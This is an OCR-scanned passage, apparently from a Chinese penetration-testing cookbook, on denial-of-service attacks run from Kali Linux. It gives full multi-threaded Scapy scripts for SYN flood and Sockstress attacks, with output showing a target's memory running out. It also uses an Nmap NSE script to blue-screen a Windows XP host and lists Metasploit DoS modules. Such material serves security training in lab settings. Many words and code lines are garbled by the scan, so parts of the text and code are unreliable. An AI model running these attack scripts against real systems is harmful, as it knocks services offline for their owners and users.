然后 会 发 送出 SYN + ACK 分 组 并 保持 连接 打开 ， 来 等 待 来 自发 起 客户 端的 最 终 
ACK 分 组 。 通 过 使 用 这 些 半 开 请 求 使 目标 过 载 ， 攻 击 者 可 以 使 服务 无 响应 。 


准备 


为 了 使 用 Scapy 对 目标 执行 完整 的 SYN 泛 洪 ， 你 需要 有 一 个 运行 TCP 网 络 服务 
的 远程 系统 。 提供 的 示例 使 用 Metasploitable2 的 实例 用 。 有 关 设 置 
Metasploitable2 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Metasploitable2" $548 » 
此 外 ， 本 节 需 要 使 用 文本 编辑 器 (如 VIM X Nano) 将 脚本 写 入 文件 系统 。 有 关 编 
写 脚本 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “使 用 文本 编辑 器 《VIM Nano) "& 


"m 


操作 步骤 


为 了 使 用 Scapy 执行 SYN 泛 洪 ， 我 们 需要 通过 与 目标 服务 关联 的 端口 发 送 TCP 
SYN 请 求 来 开始 。 为 了 向 任何 给 定 端口 发 送 TCP SYN 请 求 ， 我 们 必须 首先 构建 
此 请 求 的 层级 。 我 们 将 需要 构建 的 第 一 层 是 IP 层 : 


root@KaliLinux:~# scapy Welcome to Scapy (2.2.0) 
>>> i = IP() 
>>> i.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 
chksum= None 
Src= 127.0.0.1 
dst= 127.0.0.1 
\options\ 
>>> i.dst = "172.16.36.135" 
>>> i.display() 
HHH [ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag= 0 
ttl= 64 
proto= ip 
chksum= None 
Src= 172.16.36.224 
dst= 172.16.36.135 
\options\ 


要 构建 我 们 的 请 求 的 IP 层 ， 我 们 应 该 将 IP ARARE i 。 通过 调 

用 display() 函数 ， 我 们 可 以 确定 该 对 象 的 属性 配置 。 通常 ， 发 送 和 接收 地 址 都 
设 为 回 送 地 址 127.0.0.1 。 可 以 通过 将 i.dst 设置 为 广播 地 址 的 字符 串 值 ， 来 
更 改 目 标 地 址 并 修改 这 些 值 。 通 过 再 次 调用 display() 函数 ， 我 们 可 以 看 到 ， 不 
仅 更 新 了 目的 地 址 ， 而 且 Scapy 也 会 自动 将 源 IP 地 址 更 新 为 与 默认 接口 相关 的 地 
址 。 现 在 我 们 已 经 构建 了 请 求 的 IP 层 ， 我 们 应 该 继续 构建 TCP 层 : 


>>> t = TCP() 

>>> t.display() 

###[ TCP ]### 
sport= ftp_data 
dport= http 
seq= 0 
ack= 0 
dataofs- None 
reserved= 0 
flags= S 
window= 8192 
chksum= None 
urgptr= 0 
options= {} 


要 构建 我 们 的 请 求 的 TCP 层 ， 我 们 将 使 用 与 IP 层 相 同 的 技术 。 在 提供 的 示例 

中 ， TCP HARAT t 变量 。 如 前 所 述 ， 可 以 通过 调用 display() $ žk% 
定 默 认 配 置 。 在 这 里 ， 我 们 可 以 看 到 目标 端口 的 默认 值 是 HTTP 80 端口 。 对 于 我 
们 的 首次 扫描 ， 我 们 将 TCP 配置 保留 默认 。 现 在 我 们 构建 了 IP 和 TCP E?’ RM 
可 以 通过 堆 受 这 些 层 来 构造 请 求 : 


>>> response = sri(i/t, verbose=1, timeout=3) 
Begin emission: 
Finished to send 1 packets. 
Received 5 packets, got 1 answers, remaining © packets 
>>> response.display() 
HHH [ IP ]### 
version= 4L 
ihl- 5L 
tos- 0x0 
len- 44 
id= 0 
flags= DF 
frag- OL 
ttl= 64 
proto= tcp 
chksum- 0x9944 
Src- 172.16.36.135 
dst- 172.16.36.224 
NoptionsN 
#HH[ TCP ]### 
sport= http 
dport= ftp_data 
seq= 3651201360L 


ack= 1 
dataofs= 6L 
reserved= OL 
flags= SA 


window= 5840 
chksum- 0x1c68 
urgptr- 0 
options- [('MSS', 1460)] 
###[ Padding ]### 
load= '\x00\x00' 


"p VA38 3d 4$ F] 8L 2-08 RS RRS IP 和 TCP 层 。 然后 可 以 将 这 些 层 赋 给 
RÉATE: ASTOWA display) REALERRORE > m 
请 求 ， 就 可 以 将 其 传递 给 发 送 和 接收 函数 ， 以 便 我 们 可 以 分 析 响 应 : 


>>> request = (i/t) 
>>> request.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= tcp 
chksum= None 
src= 172.16.36.224 
dst= 172.16.36.135 
\options\ 
###[ TCP ]### 
sport= ftp_data 
dport= http 
seq- 0 
ack- 0 
dataofs- None 
reserved- 0 
flags- S 
window- 8192 
chksum- None 
urgptr- 0 
options- {} 


可 以 在 不 独立 地 构建 和 扒 登 每 个 层 的 情况 下 执行 相同 的 请 求 。 相反， 可 以 通过 直接 
调用 函数 并 向 其 传递 适当 的 参数 来 使 用 单行 命令 : 


>>> sri(IP(dst="172.16.36.135")/TCP()) 
Begin emission: 


Finished to send 1 packets. 

* 
Received 57 packets, got 1 answers, remaining © packets 
«IP version-4L ihl-5L tos=0x0 len-44 id=0 flags=DF frag-OL ttl- 
64 proto-tcp chksum=0x9944 src-172.16.36.135 dst-172.16.36.224 o 
ptions-[] |<TCP sport=http dport-ftp data seq-2078775635 ack=1 
dataofs=6L reserved=0L flags-SA window-5840 chksum=0xcaie urgptr 
-0 options-[('MSS', 1460)] |«Padding load='\x00\x00' |>>> 


SYN 泛 洪 的 效率 取决 于 在 给 定时 间 段 内 可 以 生成 的 SYN 请 求 的 数量 。 为 了 提高 这 
个 攻击 序列 的 效率 ， 我 写 了 一 个 多 线程 脚本 ， 可 以 执行 可 由 攻击 系统 处 理 的 ， 尽 可 
能 多 的 SYN 数据 包 注 入 的 并 发 进程 : 


#!/usr/bin/python 


from scapy.all 

import * from time 

import sleep 

import thread 

import random 

import logging 

logging. getLogger("Scapy. runtime") .setLevel(logging.ERROR) 


if len(sys.argv) != 4: 

print "Usage - ./syn_flood.py [Target-IP] [Port Number] [Thr 
eads |" 

print "Example - ./sock_stress.py 10.0.0.5 80 20" 

print "Example will perform a 20x multi-threaded SYN flood a 
ttack" 

print "against the HTTP (port 80) service on 10.0.0.5" 

sys.exit() 


target = str(sys.argv[1]) 
port = int(sys.argv[2] ) 
threads = int(sys.argv[3]) 


print "Performing SYN flood. Use Ctrl+C to stop attack." 
def Sie oo ranger, port): 
while 0 == 
x = random. randint (0, 65535) 
send(IP(dst-target)/TCP(dport-port, sport=x),verbose=0) 


for x in range(0, threads): 
thread.start new thread(synflood, (target,port)) 


while 0 == 
sleep(1) 


脚本 在 执行 时 接受 三 个 参数 。 这 些 参 数 包 括 目标 IP HOHE SYN 泛 洪 所 发 送 到 的 端 

口号 ， 以 及 将 用 于 执行 SYN 泛 洪 的 线程 或 并 发 进程 的 数量 。 每 个 线程 以 生成 0 到 
65,535 之 间 的 整数 值 开始 。 此 范围 表示 可 分 配给 源 端口 的 全 部 可 能 值 。 定 义 源 和 
目标 端口 地 址 的 TCP 报头 的 部 分 在 长 度 上 都 是 16 比特 。 每 个 位 可 以 为 1 或 0。 
因此 ， 有 2 ** 16 或 65,536 个 可 能 的 TCP 端口 地 址 。 单 个 源 端口 只 能 维持 一 
个 半 开 和 连接， 因此 通过 为 每 个 SYN 请 求生 成 唯一 的 源 端口 地 址 ， 我 们 可 以 大 大 提 
高 攻击 的 性 能 : 


root@KaliLinux:~# ./syn flood.py U 

sage - ./syn flood.py [Target-IP] [Port Number] [Threads] 
Example - ./sock stress.py 10.0.0.5 80 20 

Example will perform a 20x multi-threaded SYN flood attack again 
st the HTTP (port 80) service on 10.0.0.5 

root@KaliLinux:~# ./syn flood.py 172.16.36.135 80 20 

Performing SYN flood. Use Ctrl+C to stop attack. 


当 在 没有 任何 参数 的 情况 下 执行 脚本 时 ， 会 将 使 用 方法 返回 给 用 户 。 在 提供 的 示例 
中 ， 脚 本 对 托管 在 172.16.36.135 的 TCP 端口 80 上 的 HTTP Web 服务 执行 ， 
具有 20 个 并 发 线程 。 脚 本 本 身 提 供 的 反馈 很 少 ; 但 是 ， 可 以 运行 流量 捕获 工具 
(如 Wireshark 或 TCPdump) 来 验证 是 否 正 在 发 送 连接 。 在 非常 短暂 的 时 间 之 
后 ， 与 服务 器 的 连接 尝试 会 变 得 非常 慢 或 完全 无 响应 。 


工作 原理 


TCP 服务 只 允许 建立 有 限 数 量 的 半 开 连接 。 通过 快速 发 送 大 量 的 TCP SYN 请 
来， 这 些 可 用 的 连接 会 被 耗 尺 ， 并 且 服 务 器 将 不 再 能 够 接受 新 的 传 入 连接 。 No 
新 用 户 将 无 法 访问 该 服务 。 通过 将 其 用 作 DDoS 并 且 使 多 个 攻击 系统 同时 执行 脚 
本 ， 该 攻击 的 效率 可 以 进一步 加 强 。 


6.8 Sockstress DoS xi 


Sockstress DoS 攻击 涉及 到 与 目标 服务 相关 的 TCP 端口 建立 一 系列 开放 连接 。 
TCP 握手 中 的 最 终 ACK 响应 的 值 应 为 0。 


准备 


为 了 使 用 Scapy 对 目标 执行 Sockstress DoS 攻击 ， 你 需要 有 一 个 运行 TCP 网 络 服 
务 的 远程 系统 。 提供 的 示例 使 用 Metasploitable2 的 实例 用 。 有关 设置 
Metasploitable2 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Metasploitable2" $548 » 
此 外 ， 本 节 需 要 使 用 文本 编辑 器 (te VIM X; Nano) 将 脚本 写 入 文件 系统 。 AAA 
写 脚 本 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “使 用 文本 编辑 器 (VIM 和 Nano) "$t 


T 


操作 步骤 


以 下 脚本 使 用 Scapy 编写 ， 用 于 对 目标 系统 执行 Sockstress DoS 攻击 。 以 下 脚本 
可 用 于 测试 漏洞 服务 : 


#!/usr/bin/python 

from scapy.all import * 
from time import sleep 
import thread 

import logging 


import os 

import signal 

import sys 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 


if len(sys.argv) != 4: 

print "Usage - ./sock stress.py [Target-IP] [Port Number] [T 
hreads]" 

print "Example = 7506KSStress-py J0.0:0-5 21 20" 

print "Example will perform a 20x multi-threaded sock-stress 
DoS attack " 

print “against the FTP (port 21) service on 10.0.0.5" 

print "NR***NOTE***" 

print "Make sure you target a port that responds when a conn 
ection is made" 

sys.exit() 


target = str(sys.argv[1]) 
dstport = int(sys.argv[2]) 
threads = int(sys.argv[3]) 
## This is where the magic happens 
def sockstress(target, dstport): while 0 == 0: 
GHV: 

x = random.randint(0, 65535) 

response = sri(IP(dst=target)/TCP(sport=x, dport=dstport, 
flags ='S'),timeout=1,verbose=0) 

send(IP(dst-target)/ TCP(dport=dstport, sport=x,window=0, 
flags='A',ack=(response[TCP].seq + 1))/'\x00\x00',verbose=0) 


except: 
pass 


## Graceful shutdown allows IP Table Repair 
def graceful shutdown(signal, frame): 
print '\nYou pressed Ctrl+C!’ 
print 'Fixing IP Tables' 
os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d ' 
+ target + ' -j DROP') 
sys.exit() 


## Creates IPTables Rule to Prevent Outbound RST Packet to Allow 
Scapy TCP Connections 

os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d ' + 
target + ' -j DROP') 

Signal.signal(signal.SIGINT, graceful_shutdown) 


## Spin up multiple threads to launch the attack 
print "\nThe onslaught has begun...use Ctrl+C to stop the attack" 


for x in range(0, threads): 
thread.start new thread(sockstress, (target,dstport)) 


286 


## Make it go FOREVER (...or at least until Ctrl+C) 
while 0 == 0: 
sleep(1) 


«| m »| 








请 注意 ， 此 脚本 有 两 个 主要 功能 ， 包 括 sockstress 攻击 功能 和 单独 的 正常 关机 功 
能 。 关 闭 需要 单独 的 函数 ， 因 为 为 了 使 脚本 正常 运行 ， 脚 本 必须 修改 本 地 iptables 
规则 。 此 更 改 是 必需 的 ， 以 便 使 用 Scapy 完成 与 远程 主机 的 TCP 连接。 在 第 三 
章 “ 端 口 扫 描 " 的 “使 用 Scapy 配置 连接 扫描 "中 ， 更 彻底 地 解决 了 这 一 问题 。 在 执行 
脚本 之 前 前 ， 我 们 可 以 使 用 netstat 和 free 工具 为 已 建立 的 连接 和 正在 使 用 的 内 存 获 
取 基 线 : 


msfadmin@metasploitable:~$ netstat | grep ESTABLISHED 


tcp6 0 © 172.16.36.131%13464:ssh 172.16.36.1%8191:498 

26 ESTABLISHED 

udp 0 © localhost : 32840 localhost : 32840 
ESTABLISHED 


msfadmin@metasploitable:~$ free -m 


total used free shared buffers 
cached 
Mem: 503 157 345 0 13 
54 
-/+ buffers/cache: 89 413 
Swap: 0 0 0 


通过 使 用 netstat， 然 后 通过 管道 输出 到 grep 函数 ， 并 只 提取 已 建立 的 连接 ， 我 
们 可 以 看 到 只 存在 两 个 连接 。 我 们 还 可 以 使 用 free 工具 查看 当前 的 内 存 使 用 情 
况 。 -m 选项 用 于 返回 以 兆 字 节 为 单位 的 值 。 在 确定 已 建立 的 连接 和 可 用 内 存 的 
基线 后 ， 我 们 可 以 对 此 目标 服务 器 启动 攻击 : 


root@KaliLinux:~# ./sock stress.py 

Usage - ./sock stress.py [Target-IP] [Port Number] [Threads] 
Example - ./sock stress.py 10.0.0.5 21 20 

Example will perform a 20x multi-threaded sock-stress DoS attack 
against the FTP (port 21) service on 10.0.0. 


XX NOEL. * 

Make sure you target a port that responds when a connection is m 
ade 

root@KaliLinux:~# ./sock stress.py 172.16.36.131 21 20 


The onslaught has begun...use Ctrl+C to stop the attack 
通过 在 没有 任何 提供 的 参数 的 情况 下 执行 脚本 ， 脚 本 将 返回 预期 的 语法 和 用 法 。 脚 


本 在 执行 时 接受 三 个 参数 。 这 些 参 数 包 括 目标 IP 地 址 ，sock stress DoS 所 发 送 的 
端口 号 ， 以 及 将 用 于 执行 sock stress DoS 的 线程 或 并 发 进程 的 数量 。 每 个 线程 以 


生成 0 到 65,535 之 间 的 整数 值 开始 。 此 范围 表示 可 分 配给 源 端 口 的 全 部 可 能 值 。 
定义 源 和 目的 地 端口 地 址 的 TCP 报头 的 部 分 在 长 度 上 都 是 16 比特 。 每 个 位 可 以 为 
值 1 或 0。 因 此 ， 有 2 ** 16 或 65,536 个 可 能 的 TCP 端口 地 址 。 单 个 源 端口 只 
能 维持 单个 连接 ， 因 此 通过 为 每 个 连接 生成 唯一 的 源 端 口 地 址 ， 我 们 可 以 大 大 提高 
攻击 的 效率 。 一 旦 攻击 开始 ， 我 们 可 以 通过 检查 在 目标 服务 器 上 建立 的 活动 连接 ， 
来 验证 它 是 否 正常 工作 : 


msfadmin@metasploitable:~$ netstat | grep ESTABLISHED 


tcp 0 20 172.16.36.131:ftp 172.16.36.232:25624 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:12129 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:31294 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:46731 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:15281 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:47576 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:27472 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:11152 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:56245 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:1161 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:21064 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:29344 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:43747 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:59609 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:31927 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:12257 
ESTABLISHED 

tcp 9 20 172.16.36.131:ftp 172.16.36.232:54709 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:55595 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:12992 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:24171 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:37207 
ESTABLISHED 

tcp 0 20 172.16.36.131:ftp 172.16.36.232:39224 
ESTABLISHED 


在 执行 脚本 后 的 几 分钟 ， 我 们 可 以 看 到 已 建立 的 连接 的 数量 急剧 增加 。 此 处 显示 的 
输出 已 截断 ， 连 接 列表 实际 上 明显 长 于 此 : 


msfadmin@metasploitable:~$ free -m 


total used free shared buffers 
cached 
Mem: 503 497 6 0 149 
138 -/+ buffers/cache: 209 294 
Swap: 0 0 0 


通过 连续 使 用 free 工具 ， 我 们 可 以 看 到 ， 系 统 的 可 用 内 存 逐 渐 耗 尽 。 一 旦 内 存 
空闲 值 下 降 到 几乎 没有 ， 空 闲 缓冲 区 /缓存 空间 将 开始 下 降 : 


msfadmin@metasploitable:~$ free -m 


total used free shared buffers 
cached 
Mem: 503 498 4 9 9 
5 -/+ buffers/cache: 493 10 
Swap: 0 0 0 


在 本 地 系统 上 的 所 有 资源 耗 尽 之 后 ， 系 统 最 终 会 甬 溃 。 完成 此 过 程 所 需 的 时 间 将 取 
决 于 可 用 的 本 地 资源 量 。 在 这 里 提供 的 示例 中 ， 这 是 在 具有 512 MB RAM 的 
Metasploitable VM 上 执行 的 ， 攻 击 花费 了 大 约 2 分 钟 来 耗 尽 所 有 可 用 的 本 地 资源 
EAS IR AEGRO o 服务 器 崩溃 后 ， 或 者 你 希望 停止 DoS 攻击 时 ， 可 以 

按 Ctrl + C œ 


root@KaliLinux:~# ./sock stress.py 172.16.36.131 21 20 


The onslaught has begun...use Ctrl+C to stop the attack 
^C 

pressed Ctrl+C! 

Fixing IP Tables 


脚本 被 编写 来 捕获 由 于 按 Ctrl + C 而 发 送 的 终止 信号 ， 并 且 它 将 通过 去 除 在 终止 
脚本 的 执行 序列 之 前 生成 的 规则 ,来 修复 本 地 iptables ° 


工作 原理 


在 sockstress DoS 中 ， 三 次 握手 中 的 最 后 的 ACK 封包 的 窗口 值 为 0。 由 于 连接 客 
户 端的 空 窗口 所 示 ， 漏 洞 服务 不 会 传送 任何 数据 来 响应 连接 。 相反 ， 服 务 器 会 保存 
要 在 内 存 中 传输 的 数据 。 使 用 这 些 连 接 充 斤 服 务 器 将 耗 尺 服务 器 的 资源 ， 包 括 内 
存 ， 交 换 空间 和 计算 能 力 。 


6.9 使 用 Nmap NSE 执行 DoS x à 


Nmap 脚本 引擎 (NSE) 拥有 许多 可 用 于 执行 DoS 攻击 的 脚本 。 这 个 特定 的 秘籍 
演示 了 如 何 找到 NSE DoS 脚本， 确定 脚本 的 用 法 ， 以 及 如 何 执行 它们 。 


准备 


为 了 使 用 Nmap NSE 执行 DoS 攻击 ， 你 需要 有 一 个 运行 漏洞 服务 的 系统 ， 它 易 受 
Nmap NSE DoS 脚本 之 一 的 攻击 。 所 提供 的 示例 使 用 Windows XP 的 实例 。 AX 
设置 Windows 系统 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Windows Server" $t 


在 使 用 Nmap NSE 脚本 执行 DoS 测试 之 前 ， 我 们 需要 确定 哪些 DOS 脚本 可 用 。 
在 Nmap NSE 脚本 目录 中 有 一 个 greppable script.db 文件 ， 可 用 于 确定 任何 
给 定 类 别 中 的 脚本 : 


root@KaliLinux:~# grep dos /usr/share/nmap/scripts/script.db | c 
ut -d MUNG Sif 2 

broadcast-avahi-dos.nse 

http-slowloris.nse ipv6-ra-flood.nse 

smb-check-vulns.nse 

smb-flood.nse 

smb-vuln-ms10-054.nse 


通过 从 script.db 文件 中 使 用 grep 搜索 DoS， 然 后 将 输出 通过 管道 传递 
到 cut 函数 ， 我 们 可 以 提取 可 用 的 脚本 。 通过 阅读 任何 一 个 脚本 的 头 部 ， 我 们 通 
常 可 以 找到 很 多 有 用 的 信息 : 


root@KaliLinux:~# cat /usr/share/nmap/scripts/smb-vuln-ms10-054. 
nse | more 

local bin - require "bin" 

local msrpc - require "msrpc" 

local smb - require "smb" 

local string - require "string" 

local vulns - require "vulns" 

local stdnse - require "stdnse" 


description - [[ 

Tests whether target machines are vulnerable to the ms10-054 SMB 
remote memory 

corruption vulnerability. 


The vulnerable machine will crash with BSOD. 


The script requires at least READ access right to a share on a r 
emote machine. 

Either with guest credentials or with specified username/passwor 
d. 


为 了 从 上 到 下 读 取 脚 本 ， 我 们 应 该 对 文件 使 用 cat 命令 ， 然 后 通过 管道 输出 

到 more LHe 脚本 的 头 部 描述 了 它 所 利用 的 漏洞 以 及 系统 必须 满足 的 条 件 。 CE 
还 解释 了 该 汤 洞 将 导致 蓝屏 死机 (BSOD) DoS。 通过 进一步 向 下 滚动 ， 我 们 可 以 
找到 更 多 有 用 的 信息 : 


-- @usage nmap -p 445 «target» 

--script-smb-vuln-ms10-054 

--script-args unsafe 

--- @args unsafe Required to run the script, "safty swich" to pr 
event running it by accident 

-- @args smb-vuln-msi10-054.share Share to connect to (defaults t 
o SharedDocs) 


-- @usage nmap -p 445 «target» 

--script-smb-vuln-ms10-054 

--script-args unsafe 

--- @args unsafe Required to run the script, "safty swich" to pr 
event running it by accident 

-- @args smb-vuln-msi10-054.share Share to connect to (defaults t 
o SharedDocs) 


-- @output 
-- Host script results: 
-- | smb-vuln-ms10-054: 
-- | VULNERABLE : 

| SMB remote memory corruption vulnerability 
-- | State: VULNERABLE 

| IDs: CVE:CVE-2010-2550 
-- | Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/ 
CSCAISCAMATC) 
-- | Description: 
-- | The SMB Server in Microsoft Windows XP SP2 and SP3, W 
indows Server 2003 SP2, 
-- | Windows Vista SP1 and SP2, Windows Server 2008 Gold, 
SP2, and R2, and Windows 7 
-- | does not properly validate fields in an SMB request, 
which allows remote attackers 
-- | to execute arbitrary code via a crafted SMB packet, a 
ka "SMB Pool Overflow Vulnerability." 


在 脚本 中 ， 我 们 可 以 找到 脚本 用 法 和 脚本 提供 的 参数 的 描述 。 它 还 提供 了 有 关 其 利 
用 的 漏洞 的 其 他 详细 信息 。 要 执行 脚本 ， 我 们 需要 在 Nmap 中 使 用 --script 选 


项 : 


root@KaliLinux:~# nmap -p 445 172.16.36.134 --script=smb-vuln-ms 
10-054 --script-args unsafe-1 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-02-28 23:45 EST 
Nmap scan report for 172.16.36.134 

Host is up (0.00038s latency). 

PORT STATE SERVICE 

445/tcp open microsoft-ds 

MAC Address: 00:0C:29:18:11:FB (VMware) 


Host script results: 
| smb-vuln-msi10-054: 

| VULNERABLE: 

| SMB remote memory corruption vulnerability 

| State: VULNERABLE 

| IDs: CVE:CVE-2010-2550 

| Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C 
/I:C/A:C) 

| Description: 

| The SMB Server in Microsoft Windows XP SP2 and SP3, Wind 
ows Server 2003 SP2, 

| Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2 
, and R2, and Windows 7 

| does not properly validate fields in an SMB request, whi 
ch allows remote attackers 

| to execute arbitrary code via a crafted SMB packet, aka 
"SMB Pool Overflow Vulnerability." 


在 提供 的 示例 中 ，Nmap 被 定向 为 仅 扫描 TCP 端口 445， 这 是 该 漏洞 的 相关 端 
Qo --script 选项 与 指定 所 使 用 的 脚本 的 参数 一 起 使 用 。 我 们 传递 了 单个 脚本 
参数 来 表明 可 以 接受 不 安全 扫描 。 此 参数 的 描述 是 ， 可 用 于 授权 DoS 攻击 的 安全 
开关 。 在 Nmap 中 执行 脚本 后 ， 输 出 表明 系统 存在 漏洞 。 查看 Windows XP 机 
器 ， 我 们 可 以 看 到 DOS 成 功 ， 这 导致 了 蓝屏 : 
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本 练习 中 演示 的 Nmap NSE 脚本 是 缓冲 区 溢出 攻击 的 示例 。 一 般 来 说 ， 缓冲 区 溢 
出 能 够 导致 拒绝 服务 ， 因 为 它们 可 能 导致 任意 数据 被 加 载 到 非 预期 的 内 存 段 。 这 可 
能 中 断 执 行 流程 ， 并 导致 服务 或 操作 系统 崩 演 。 


6.10 Metasploit DoS 攻击 


Metasploit 框 架 有 许多 辅助 模块 脚本 ， 可 用 于 执行 DoS 攻击 。 这 个 特定 的 秘籍 演示 
了 如 何 找到 DoS 模块 ， 确 定 模块 的 使 用 方式 ， 以 及 如 何 执行 它们 。 


准备 


为 了 使 用 Metasploit 执行 DoS 攻击 ， 你 需要 有 一 个 运行 漏洞 服务 的 系统 ， 它 昂 受 
Metasploit DoS 辅助 模块 之 一 的 攻击 。 所 提供 的 示例 使 用 Windows XP 的 实例 。 
有 关 设 置 Windows 系统 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Windows 
Server" 秘 籍 。 


操作 步骤 


在 使 用 Metasploit 辅助 模块 执行 DoS 测试 之 前 ， 我 们 需要 确定 哪些 DoS 模块 可 
用 。 相关 模块 可 以 通过 浏览 Metasploit 目录 树 来 确定 : 


root@KaliLinux:~# cd /usr/share/metasploit-framework/modules/aux 

iliary/ dos/ 

root@KaliLinux:/usr/share/metasploit -framework/modules/auxiliary 

/dos# ls cisco dhcp freebsd hp http mdns ntp pptp samba 
scada smtp solaris ssl syslog tcp wifi windows wireshar 
k 

root@KaliLinux:/usr/share/metasploit -framework/modules/auxiliary 

/dos# cd windows/ 

root@KaliLinux:/usr/share/metasploit -framework/modules/auxiliary 

/dos/ windows# ls appian browser ftp games http llmnr nat 
rdp smb smtp tftp 

root@KaliLinux:/usr/share/metasploit -framework/modules/auxiliary 

/dos/ windows# cd http 

root@KaliLinux:/usr/share/metasploit -framework/modules/auxiliary 

/dos/ windows/http# ls ms10 065 ii6 asp dos.rb 

pi3web isapi.rb 





通过 浏览 / modules / auxiliary / dos 目录 ， 我 们 可 以 看 到 各 种 类 别 的 DOS 
模块 。 在 提供 的 示例 中 ， 我 们 已 浏览 包含 Windows HTTP 拒绝 服务 漏洞 的 目录 : 


root@KaliLinux:/usr/share/metasploit -framework/modules/auxiliary 
/dos/ windows/http# cat ms10_065 116 asp dos.rb | more 

HH 

# This file is part of the Metasploit Framework and may be subje 
ct to 

# redistribution and commercial restrictions. Please see the Met 
asploit 

4 web site for more information on licensing and terms of use. 

# http://metasploit.com/ 

HH 





require 'msf/core' 
class Metasploit3 < Msf::Auxiliary 


include Msf::Exploit::Remote::Tcp 
include Msf::Auxiliary::Dos 


def initialize(info = {}) 
super(update info(info, 


' Name ' => 'Microsoft IIS 6.0 ASP Stack Exhaust 
ion Denial of Service', 
'Description' => %q{ 


The vulnerability allows remote unauthenticated atta 
ckers to force the IIS server 

to become unresponsive until the IIS service is rest 
arted manually by the administrator. 

Required is that Active Server Pages are hosted by t 
he IIS and that an ASP script reads 

out a Post Form value. 


}, 


'Author' => 


"Alligator Security Team', 
'Heyder Andrade <heyder[at]alligatorteam.org>', 


'Leandro Oliveira <leadro[at]alligatorteam.org>' 


1, 
' License' -» MSF LICENSE, 
'References' => 
[ 
[ 'CVE', '2010-1899' ], 
[ 'OSVDB', '67978'], 
[ 'MSB', 'MS10-065'], 
[ 4EDB | 21516%7 9] 
1, 
'DisclosureDate' => 'Sep 14 2010')) 


为 了 从 上 到 下 读 取 脚本 ， 我 们 应 该 对 文件 使 用 cat 命令 ， 然 后 通过 管道 输出 

到 more 工具 。 脚本 的 顶部 描述 了 它 所 利用 的 漏洞 以 及 系统 必须 满足 的 条 件 。 我 
们 还 可 以 在 Metasploit 框架 控制 台中 识别 潜在 的 DoS 漏洞 。 要 访问 它 ， 在 终端 中 
键入 msfconsole 


root@KaliLinux:~# msfconsole # cowsay++ 





< metasploit > 


\ P 
\ (00) 
(en) )\ 


Large pentest? List, sort, group, tag and search your hosts and 
services in Metasploit Pro -- type 'go pro' to launch it now. 


-[ metasploit v4.6.0-dev [core:4.6 api:1.0] 
+ -- --=[ 1053 exploits - 590 auxiliary - 174 post 
+ -- --z[ 275 payloads - 28 encoders - 8 nops 


msf » 


一 旦 打开 ， 搜 索 命令 可 以 与 搜索 项 结合 使 用 ， 来 确定 要 使 用 的 漏洞 利用 : 


msf » search dos 


Matching Modules 


Name D 
isclosure Date Rank Description ---- 

auxiliary/admin/webmin/edit_html_fileaccess 2 
012-09-06 normal Webmin edit_html.cgi file Parameter T 
raversal Arbitrary File Access 

auxiliary/dos/cisco/ios_http_percentpercent 2 
000-04-26 normal Cisco IOS HTTP GET /%% request Denial 


of Service 
auxiliary/dos/dhcp/isc_dhcpd_clientid 
normal ISC DHCP Zero Length ClientID Denial 
of Service Module 
auxiliary/dos/freebsd/nfsd/nfsd_mount 


normal FreeBSD Remote NFS RPC Request Denial 

of Service 

auxiliary/dos/hp/data_protector_rds 2 
011-01-08 manual HP Data Protector Manager RDS DOS 

auxiliary/dos/http/3com_superstack_switch 2 
004-06-24 normal 3Com SuperStack Switch Denial of Serv 
ice 

auxiliary/dos/http/apache_mod_isapi 2 
010-03-05 normal Apache mod_isapi <= 2.2.14 Dangling P 
ointer 

auxiliary/dos/http/apache_range_dos 2 
011-08-19 normal Apache Range header DoS (Apache Kille 
r) 

auxiliary/dos/http/apache_tomcat_transfer_encoding 2 
010-07-09 normal Apache Tomcat Transfer-Encoding Infor 


mation Disclosure and DoS 


在 提供 的 示例 中 ， 搜 索 项 dos 用 于 查询 数据 库 。 返回 一 系列 DOS 辅助 模块 ， 并且 
包括 每 个 DoS 辅助 模块 的 相对 路 径 。 此 相对 路 径 可 用 于 缩小 搜索 结果 范围 : 


